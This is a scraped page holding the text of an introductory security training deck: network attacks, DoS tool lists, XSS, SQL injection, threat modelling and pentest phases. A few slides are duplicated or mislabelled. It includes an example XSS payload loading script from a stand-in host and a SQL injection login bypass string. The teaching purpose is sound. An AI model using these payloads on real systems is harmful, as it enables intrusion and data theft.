20240702 Présentation Plateforme GenAI.pdf20240702 Présentation Plateforme GenAI.pdf
20240702 Présentation Plateforme GenAI.pdf
 
Quantum Communications Q&A with Gemini LLM
Quantum Communications Q&A with Gemini LLMQuantum Communications Q&A with Gemini LLM
Quantum Communications Q&A with Gemini LLM
 
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - MydbopsScaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
 
The Increasing Use of the National Research Platform by the CSU Campuses
The Increasing Use of the National Research Platform by the CSU CampusesThe Increasing Use of the National Research Platform by the CSU Campuses
The Increasing Use of the National Research Platform by the CSU Campuses
 
Active Inference is a veryyyyyyyyyyyyyyyyyyyyyyyy
Active Inference is a veryyyyyyyyyyyyyyyyyyyyyyyyActive Inference is a veryyyyyyyyyyyyyyyyyyyyyyyy
Active Inference is a veryyyyyyyyyyyyyyyyyyyyyyyy
 
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdfBT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
 

Security concepts

  • 2. • According to the Internet Storm Center (http://isc.sans.org),a computer connected to the Internet has an average of 5 minutesbefore it falls under some form of attack.
  • 5. AGENDA: 1. Network Security 2. Threats and Vulnerability 3. Application, Data and Host Security 4. Security Threat Modelling 5. Penetration Testing
  • 7. NETWORK SECURITY PRINCIPLE • Confidentiality: only sender, intended receiver should “understand” message contents o sender encrypts message o receiver decrypts message • Authentication: sender, receiver want to confirm identity of each other • Message Integrity: sender, receiver want to ensure message not altered (in transit, or afterwards) without detection • Access and Availability: services must be accessible and available to users
  • 9. FRIENDS AND ENEMIES: ALICE, BOB, TRUDY • well-known in network security world • Bob, Alice (lovers!) want to communicate “securely” • Trudy (intruder) may intercept, delete, add messages secure sender secure receiver channel data, control messages data data Alice Bob Trudy data
  • 10. 8- Who might Bob, Alice be? • … well, real-life Bobs and Alices! • Web browser/server for electronic transactions (e.g., on-line purchases) • on-line banking client/server • DNS servers • routers exchanging routing table updates • other examples?
  • 12. 8-
  • 14. APPLICATION LAYER ATTACK – LAYER 7 • HTTP: Virus, Worms, SQLInjection, XSS • Malware: Trojans, Backdoors
  • 15. SNIFFER ATTACK • Wireshark • CAIN and Abel • TCPdump • Kismet • Dsniff • etthercap • Paros Proxy, Burp proxy
  • 16. MAN IN THE MIDDLE ATTACK
  • 18. DOS ATTACK TOOLS • Jolt2 • Bubonic.c • Land and LaTierra • Targa • Blast20 • Nemesy • Panther2 • CrazyPinger • Some Trouble • UDP Flood • FSM • FSMax
  • 19. REFLECTION DOS The attacking machines send out huge volumes of SYN packets but with the IP source address pointing to the target machine.
  • 21. MANGLE – INVALID PACKET ATTACK Tools to simulate Invalid Packet attack • Nmap • Nessus Tools to handle this • Iptables(linux) • Checkpoint • Netfilter • Application need to handle this
  • 24. TCP ATTACK • Send multiple TCP Reset packet
  • 26. BOTNET • Exploit the system and make it botclient->Make botnet server aware it has joined botnet->Install Anti- anti virus module->Listen to botnet server for instruction
  • 27. BUFFER OVERFLOW A flaw that occurs when more data is written to a block of memory, or buffer, than the buffer is allocated to hold.
  • 28. ROGUE DHCP SERVER • Malicious software in the network • A type of Man in middle attack • Installed using rootkit • Will spoof data, make network slow and create network problems
  • 29. EAVESDROPPING • Eavesdropping is secretly listening to the private conversation of others without their consent, as defined by Black's Law Dictionary. • Unencrypted open wifi network • Tool: Firesheep
  • 30. SOCIAL ENGINEERING ATTACK • Phishing is a technique of fraudulently obtaining private information. Typically, the phisher sends an e-mail that appears to come from a legitimate business—a bank, or credit card company—requesting "verification" of information and warning of some dire consequences if it is not provided. • Phone phishing uses a rogue IVR system to recreate a legitimate-sounding copy of a bank or other institution's IVR system. • Baiting is like the real-world Trojan Horse that uses physical media and relies on the curiosity or greed of the victim. • Shoulder surfing involves observing an employee's private information over their shoulder. This type of attack is common in public places such as airports, airplanes or coffee shops.
  • 31. WORM • Malicious software in the network • A type of Man in middle attack • Installed using rootkit • Will spoof data, make network slow and create network problems
  • 32. ROOTKIT A rootkit is a stealthy type of software, typically malicious, designed to hide the existence of certain processes or programs from normal methods of detection and enable continued privileged access to a computer.
  • 33. MAC FLOODING - ARP In a typical MAC flooding attack, a switch is fed many Ethernet frames, each containing different source MAC addresses, by the attacker. The intention is to consume the limited memory set aside in the switch to store the MAC address table. Tool: dsniff
  • 34. DNS CACHE POISONING DNS spoofing (or DNS cache poisoning) is a computer hacking attack, whereby data is introduced into a Domain Name System (DNS) resolver's cache, causing the name server to return an incorrect IP address, diverting traffic to the attacker's computer (or any other computer).
  • 35. URL ENCODING OR CANONICALIZATION Canonicalization is when a resource can be represented in more than one manner. Canonicalization of URLs occurs in a similar manner where http://doman.tld/user/foo.gif and http://domain.tld/user/bar/../foo.gif would represent the same image file Results in XSS and SQL Injection attack. Cross-Site Scripting Excerpt from an arbitrary web page - “getdata.php”: echo $HTTP_GET_VARS[“data”]; URL-Encoded attack: http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2f www.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e HTML execution: <script src=”http://www.badplace.com/nasty.js”></script> cheat sheet
  • 36. PACKET TAPPING • Hardware to monitor packet • vssmonitoring.com
  • 37. MIME HEADER PARSING • Several Win32 mass mailers send themselves via an email with a MIME encoded malicious executable with a malformed header, and the executable will silently execute unbeknownst to the user. • This occurs whenever Internet Explorer parses the mail and thus can happen when simply reading or previewing email. Thus, email worms can spread themselves without any user actually executing or detaching a file. http://www.kb.cert.org/vuls/id/980499
  • 38. PACKET TAPPING • Hardware to monitor packet • vssmonitoring.com
  • 39. REPLAY ATTACK • A replay attack (also known as playback attack) is a form of network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed.
  • 40. KEYLOGGER • Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording (or logging) the keys struck on a keyboard • There are numerous keylogging methods, ranging from hardware and software-based.
  • 44. TOP 10 VULNERABILITY SCANNER TOOLS 1. Nessus 2. openVAS 3. Core Impact 4. Nexpose 5. GFI Languard 6. Qualysguard 7. MBSA 8. Retina 9. Secunia 10. SAINT
  • 45. VULNERABILITY RESEARCH WEBSITES • http://www.kb.cert.org/vuls • www.securitytracker.com • www.microsoft.com/security • www.securiteam.com • www.packetstormsecurity.com • www.hackerstorm.com • www.hackerwatch.org • www.securityfocus.com • www.securitymagazine.com
  • 47. SOFTWARE EXPLOITATION • Database • Email • Spyware – Join MS spynet using Windows defender • Rootkits - http://www.liutilities.com/products/wintasks pro/processlibrary.
  • 48. SURVIVING MALICIOUS CODE • Viruses • Trojan Horses • Logic Bombs • Worms • Antivirus Software
  • 49. ATTACK • Access attack – Dumpster diving, Eavesdropping, Snooping, Interception • Modification and Repudiation attack • DOS attack – ping of death, buffer overflow • Botnets - http://www.microsoft.com/security/sir
  • 50. COMMON ATTACKS • Backdoor • Spoofing • Phishing • Man-In-Middle attack • Replay attack • Password guessing • Privilege escalation
  • 51. 3. APPLICATION, DATA AND HOST SECURITY
  • 52. APPLICATION AND DATA SECURITY • Web Application • OWASP Top 10 - https://www.owasp.org/index.php/OWASP_Top_Ten_Che at_Sheet • Hacking Tools: Instant Source, Wget,WebSleuth BlackWidow,WindowBomb,Burp,cURL
  • 53. SQL – TABLE NAME USERS Name Age Email Password City Ram 35 ram@abc.co m ram@123 Bangalore Krishna 24 Krishna@nec. com 098kkk Mysore Parul 20 parul@gmail. com Pp234 chennai Select age from users where name=‘Parul’; Update users set email=‘ram@gmail.ocm’ where name=Ram;-- This is comment INSERT into users values (‘Puja’, 30, ‘puja@gmail.com’,’ppp123’,’Ooty’); DROP TABLE users; e.g PHP code $result = mysql_query(“select * from users where(name=‘$user’ and password=‘$pass’);”); Add username as Bina’ OR 1=1);-- $result = mysql_query(“select * from users where(name=‘Bina’ OR 1=1);-- and password=‘junkvalue’);”);
  • 55. SQL INJECTION COUNTERMEASURES • Input validation – Check it is in valid format - whitelisting – Input Sanitization  Blacklisting-avoid ‘ ; --  Escaping problematic chars  Use Prepared statements $db=new mysql(“localhost”,”Sita”,”ssttpass”,”DB”); $statement=$db->prepare(“select * from users where(name=? And password=?);”); $statement->bind_param(“ss”,$user, $pass); $statement->execute();
  • 57. XSS • Stored XSS – Bad website->send malicious script to genuine web server – Client access genuine web server – Run malicious script and sends data to attacker • Reflected XSS attack • Echoed input • Prevention: Input validation
  • 58. 4. SECURITY THREAT MODELING
  • 59. IMPORTANT KEYWORDS • Threat Model • Asset • Threat • Attack • Attacker • Impact • Probability • Mitigation • Subject
  • 60. IMPORTANT KEYWORDS CONTD… • Object • Action • Intended Action • Unintended Action • Trust Boundary • Subject/Object Matrix • Actor/Action Matrix • Data Flow Diagram • Attack Tree • IT Audit
  • 61. THREAT MODELING • Formal method to identify and enumerate risk • Make informed risk decisions in regards to – Actions – Threats – Mitigation against risk
  • 62. WHAT CAN BE THREAT MODELED? • Applications/ Software • Systems • Policies and Procedure • Business Processes • Anything….
  • 63. WHEN TO DO THREAT MODELING • Should be part of SDL • Should be Iterative Process • Whenever changes are made
  • 64. RISK MANAGEMENT • Risk Identification – incidents, bug reports, testing • Risk Enumeration & Classification – impact, how and when it can occur, nature of risk • Mitigation identification – cost benefit analysis • Mitigation testing – Penetration testing, Third party design review, procedural review and management signoff, Legal review
  • 65. THREAT MODEL PROCESS OVERVIEW • Define Use Scenarios • Define Security Assumptions • Create/Update data flow diagram • System Decomposition • Identify Threats • Determine Risks • Plan Mitigations • Iterate Threat Model
  • 66. THREAT MODEL PROCESS METHODOLOGIES • Microsoft STRIDE/DREAD • NSA’s InfoSec Assessment Methodlogy • CERT’s Octave
  • 67. STRIDE • Spoofing • Tempering • Repudiation • Information Disclosure • Denial of Service • Escalation of Privilege
  • 68. DREAD • Damage Potential • Reproducibility • Exploitability • Affected Users • Discoverability
  • 69. IAM • Designed by NSA • Used by US Federal Government • Assessment broken into 10 different areas • Designed to assess the risk of automated information systems that support infra • Highly detailed and rigid process http://csrc.nist.gov/publications/PubsSPs.html#800-30 http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf
  • 70. OCTAVE • Originates from Carnegie Mellon University’s S/W engg institute in collaboration with CERT • Focusses on Org risk not technical • OCTAVE for large org and OCTAVE-S for small org. http://www.cert.org/octave/
  • 71. MS THREAT MODELING TOOL • Based on CIA methodology • Comprehensive attack library • Contain helpful advanced features http://www.microsoft.com/en-in/download/confirmation.aspx?id=42518 http://msdn.microsoft.com/en-us/library/ff649779.aspx
  • 73. THREE PRE TEST PHASES • Footprinting: – Whois(internic.net), Smartwhois, nslookup – Check company webpage, contact, location, numbers, www.archive.org, whatismyip.com – Employee blogs, Job boards • Scanning – Identifying active systems – Discover open ports and access points – Fingerprinting the OS – Uncovering services on ports Tools-> nmap, ping, traceroute, netcat
  • 74. THREE PRE TEST PHASES CONTD…. • Enumerating – Identify user accounts – discover NetBIOS name with Nbtscan – SNMPutil for SNMP – Windows DNS query – Establishing Null session Tools-> Vulnerability Scanner: Retina, SAINT Password Crackers: Brutus
  • 75. IMPORTANT URLS • Privilege Escalation: http://blog.spiderlabs.com/2012/12/my-5-top-ways-to- escalate-privileges.html • Sniffer Tools : http://sectools.org/tag/sniffers/
  • 76. DEFENDING REPUTATION ON INTERNET • http://www.defendmyname.com • http://www.reputationdefender.com • http://www.visibletechnologies.com
  • 77. REFERENCES • Google • Old training Materials • Wikipedia • Security books
  • 79. a %61 backspace %08 : %3A b %62 tab %09 ; %3B c %63 linefeed %0A < %3C d %64 creturn %0D = %3D e %65 space %20 > %3E f %66 ! %21 ? %3F g %67 " %22 @ %40 h %68 # %23 A %41 i %69 $ %24 B %42 j %6A % %25 C %43 k %6B & %26 D %44 l %6C ' %27 E %45 m %6D ( %28 F %46 n %6E ) %29 G %47 o %6F * %2A H %48 p %70 + %2B I %49 q %71 , %2C J %4A r %72 - %2D K %4B s %73 . %2E L %4C t %74 / %2F M %4D u %75 0 %30 N %4E v %76 1 %31 O %4F w %77 2 %32 P %50 x %78 3 %33 Q %51 y %79 4 %34 R %52 z %7A 5 %35 S %53 { %7B 6 %36 T %54 | %7C 7 %37 U %55 } %7D 8 %38 V %56 ~ %7E 9 %39 W %57 X %58 Y %59 Z %5A [ %5B %5C ] %5D ^ %5E _ %5F ` %60

Editor's Notes

  1. A compromised-key attack occurs when the attacker determines the key, which is a secret code or number used to encrypt, decrypt, or validate secret information. This key corresponds to the certificate associated with the server. When the attacker is successful in determining the key, the attacker uses the key to decrypt encrypted data without the knowledge of the sender of the data. There are two sensitive keys in use in public key infrastructure (PKI) that must be considered: the private key that each certificate holder has and the session key that is used after a successful identification and session key exchange by the communicating partners.
  2. A compromised-key attack occurs when the attacker determines the key, which is a secret code or number used to encrypt, decrypt, or validate secret information. This key corresponds to the certificate associated with the server. When the attacker is successful in determining the key, the attacker uses the key to decrypt encrypted data without the knowledge of the sender of the data. There are two sensitive keys in use in public key infrastructure (PKI) that must be considered: the private key that each certificate holder has and the session key that is used after a successful identification and session key exchange by the communicating partners.
  3. The Smurf Attack is a distributed denial-of-service attack in which large numbers of Internet Control Message Protocol (ICMP) packets with the intended victim'sspoofed source IP are broadcast to a computer network using an IP Broadcast address. Most devices on a network will, by default, respond to this by sending a reply to the source IP address. If the number of machines on the network that receive and respond to these packets is very large, the victim's computer will be flooded with traffic. This can slow down the victim's computer to the point where it becomes impossible to work on.
  4. In computer networking, a mangled or invalid packet is a packet — especially IP packet — that either lacks order or self-coherence, or contains code aimed to confuse or disrupt computers, firewalls, routers, or any service present on the network. Their usage is associated with a type of network attack called a denial-of-service (DoS) attack. They aim to destabilize the network and sometimes to reveal its available services – when network operators must restart the disabled ones.[1] Mangled packets can be generated by dedicated software such as nmap or Nessus. As of 2008, most invalid packets are easily filtered by modern stateful firewalls. Most switches have some rate-limiting and ACL capability. Some switches provide automatic and/or system-wide rate limiting, traffic shaping, delayed binding (TCP splicing), deep packet inspection and Bogon filtering (bogus IP filtering) to detect and remediate denial-of-service attacks through automatic rate filtering and WAN Link failover and balancing.[ In computing, a stateful firewall (any firewall that performs stateful packet inspection (SPI) or stateful inspection) is a firewall that keeps track of the state of network connections (such as TCP streams, UDP communication) traveling across it. The firewall is programmed to distinguish legitimate packets for different types of connections. Only packets matching a known active connection will be allowed by the firewall; others will be rejected. Stateful inspection, also referred to as Dynamic Packet Filtering, is a security feature often included in business networks. Check Point Software introduced stateful inspection in the use of its FireWall-1 in 1994.‏‏[1][2]
  5. A SYN flood is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic. Filtering Increasing Backlog Reducing SYN-RECEIVED Timer Recycling the Oldest Half-Open TCP SYN Cache SYN cookies Hybrid Approaches Firewalls and Proxies
  6. By late 2007 Comcast began using forged TCP resets to cripple peer-to-peer and certain groupware applications on their customers' computers.[4][5] This started a controversy, which was followed by the creation of the Network Neutrality Squad (NNSquad) by Lauren Weinstein, Vint Cerf, David Farber, Craig Newmark and other well-known founders of and champions of openness on the Internet.[6] In 2008 the NNSquad released the NNSquad Network Measurement Agent, a Windows software program written by John Bartas, which could detect Comcast's forged TCP resets and distinguish them from real endpoint-generated resets. The technology to detect the resets was developed from the earlier Open-source "Buster" software which used forged resets to block malware and ads in web pages.
  7. sending a large number of UDP packets to random ports on a remote host. As a result, the distant host will: Check for the application listening at that port; See that no application listens at that port; Reply with an ICMP Destination Unreachable packet.
  8. A rogue DHCP server is a DHCP server on a network which is not under the administrative control of the network staff. It is a network device such as a modem or arouter connected to the network by a user who may be either unaware of the consequences of their actions or may be knowingly using it for network attacks such asman in the middle. Some kind of computer viruses or malicious software have been found to set up a rogue DHCP, especially for those classified in the "Rootkit" category.
  9. A rogue DHCP server is a DHCP server on a network which is not under the administrative control of the network staff. It is a network device such as a modem or arouter connected to the network by a user who may be either unaware of the consequences of their actions or may be knowingly using it for network attacks such asman in the middle. Some kind of computer viruses or malicious software have been found to set up a rogue DHCP, especially for those classified in the "Rootkit" category.
  10. A rogue DHCP server is a DHCP server on a network which is not under the administrative control of the network staff. It is a network device such as a modem or arouter connected to the network by a user who may be either unaware of the consequences of their actions or may be knowingly using it for network attacks such asman in the middle. Some kind of computer viruses or malicious software have been found to set up a rogue DHCP, especially for those classified in the "Rootkit" category.
  11. A rogue DHCP server is a DHCP server on a network which is not under the administrative control of the network staff. It is a network device such as a modem or arouter connected to the network by a user who may be either unaware of the consequences of their actions or may be knowingly using it for network attacks such asman in the middle. Some kind of computer viruses or malicious software have been found to set up a rogue DHCP, especially for those classified in the "Rootkit" category.
  12. A rogue DHCP server is a DHCP server on a network which is not under the administrative control of the network staff. It is a network device such as a modem or arouter connected to the network by a user who may be either unaware of the consequences of their actions or may be knowingly using it for network attacks such asman in the middle. Some kind of computer viruses or malicious software have been found to set up a rogue DHCP, especially for those classified in the "Rootkit" category.
  13. A rogue DHCP server is a DHCP server on a network which is not under the administrative control of the network staff. It is a network device such as a modem or arouter connected to the network by a user who may be either unaware of the consequences of their actions or may be knowingly using it for network attacks such asman in the middle. Some kind of computer viruses or malicious software have been found to set up a rogue DHCP, especially for those classified in the "Rootkit" category.
  14. A rogue DHCP server is a DHCP server on a network which is not under the administrative control of the network staff. It is a network device such as a modem or arouter connected to the network by a user who may be either unaware of the consequences of their actions or may be knowingly using it for network attacks such asman in the middle. Some kind of computer viruses or malicious software have been found to set up a rogue DHCP, especially for those classified in the "Rootkit" category.
  15. http://www.technicalinfo.net/papers/URLEmbeddedAttacks.html
  16. A network tap is a hardware device which provides a way to access the data flowing across a computer network. In many cases, it is desirable for a third party to monitor the traffic between two points in the network. If the network between points A and B consists of a physical cable, a "network tap" may be the best way to accomplish this monitoring. The network tap has (at least) three ports: an A port, a B port, and a monitor port. A tap inserted between A and B passes all traffic through unimpeded, but also copies that same data to its monitor port, enabling a third party to listen.
  17. MIME types are defined by a Content-Type header. In addition to the associated application, each type has a variety of associated settings including the icon, whether to show the extension, and whether to automatically pass the file to the associated application when the file is being downloaded. When receiving an HTML email with Microsoft Outlook and some other email clients, code within Internet Explorer actually renders the e-mail. If the e-mail contains a MIME embedded file, Internet Explorer would parse the email and attempt to handle the embedded MIME file. Vulnerable versions of Internet Explorer would check whether the application should automatically be opened (passed to the associated application without prompting) by examining the Content-Type header. For example, audio/x-wav files are automatically passed to Windows Media Player for playing. However, a bug exists in vulnerable versions of Internet Explorer where files are passed to the incorrect application. For example a MIME header may appear as:
  18. A network tap is a hardware device which provides a way to access the data flowing across a computer network. In many cases, it is desirable for a third party to monitor the traffic between two points in the network. If the network between points A and B consists of a physical cable, a "network tap" may be the best way to accomplish this monitoring. The network tap has (at least) three ports: an A port, a B port, and a monitor port. A tap inserted between A and B passes all traffic through unimpeded, but also copies that same data to its monitor port, enabling a third party to listen.
  19. Many of the protocols in the TCP/IP suite do not provide mechanisms for authenticating the source or destination of a message. They are thus vulnerable to spoofing attacks when extra precautions are not taken by applications to verify the identity of the sending or receiving host. IP spoofing and ARP spoofing in particular may be used to leverage man-in-the-middle attacks against hosts on a computer network. Spoofing attacks which take advantage of TCP/IP suite protocols may be mitigated with the use of firewalls capable of deep packet inspection or by taking measures to verify the identity of the sender or recipient of a message.
  20. Many of the protocols in the TCP/IP suite do not provide mechanisms for authenticating the source or destination of a message. They are thus vulnerable to spoofing attacks when extra precautions are not taken by applications to verify the identity of the sending or receiving host. IP spoofing and ARP spoofing in particular may be used to leverage man-in-the-middle attacks against hosts on a computer network. Spoofing attacks which take advantage of TCP/IP suite protocols may be mitigated with the use of firewalls capable of deep packet inspection or by taking measures to verify the identity of the sender or recipient of a message.
  21. The Trojan horse possesses the typical abilities such as opening up backdoor, stealing information, modifying some drivers and lurking deep in a target system as well as the ability to propagate, attack and make use of web browser techniques.
  22. The Trojan horse possesses the typical abilities such as opening up backdoor, stealing information, modifying some drivers and lurking deep in a target system as well as the ability to propagate, attack and make use of web browser techniques.
  23. Ss: format type i.e string and string
  24. Threat Model: A systemetic examination of a system or processes to determine potential risk to assets Asset: money, goodwill Threat: Undesired action or outcome against an asset Attack: Specific action taken by attacker to realize the threat Impact: the costs either direct or indirect to an organization Subject-known as user or actor – unique user type within a system
  25. Object: An item of interest same as asset Action: Activity done by subject
  26. Mitigation testing should be performed by other people or organization that the one did mitigation
  27. Use scenarios: Intendend and unintended actionnto be determined, need to know everything which system is supposed to do or allow, external dependencies
  28. Use scenarios: Intendend and unintended actionnto be determined, need to know everything which system is supposed to do or allow, external dependencies
  29. Spoofing: Impersonate a user or process in an unauthorized manner Tempering: Alteration of resource without authorization Repudiation: No proof or records after the fact that can identify the actors and actions involved Information Disclosure: Unauthorized reading of data or information Unauthorized prevention of an intended action Granting greater levels of privilege than is authorized
  30. IF the threat is realized how much damage can be caused. With some no 1 to 10 Reproducibility: How difficult is to reproduce the circumstances in which the threat can be realized(very difficult(1), Moderate difficult(5) and low difficult to produce(10) Exploitability: What tools and skills are required to realize the threat. Affected users: How many users will be affected. No users, few users and all users Discoverability: How difficult is to discover the threat
  31. National Security Agency Benefits: rigorous, certification available Drawbacks: Focuses on vulnerabilities
  32. National Security Agency Benefits: rigorous, certification available Drawbacks: Focuses on vulnerabilities
  33. National Security Agency Benefits: rigorous, certification available Drawbacks: Focuses on vulnerabilities